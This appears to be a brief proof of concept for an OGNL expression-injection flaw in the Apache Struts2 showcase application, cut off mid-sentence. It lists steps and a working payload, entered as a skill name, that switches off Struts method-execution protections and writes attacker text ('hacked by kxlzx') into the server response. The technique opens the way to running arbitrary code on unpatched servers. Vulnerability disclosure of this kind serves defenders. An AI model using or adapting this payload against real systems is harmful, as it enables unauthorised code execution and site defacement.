Proof of concept
Run struts2-showcase
Open url: http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV
write skill name to %{expr} for example:
%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
submit the form
The issue, in order to work, need a redirect result defined as the following: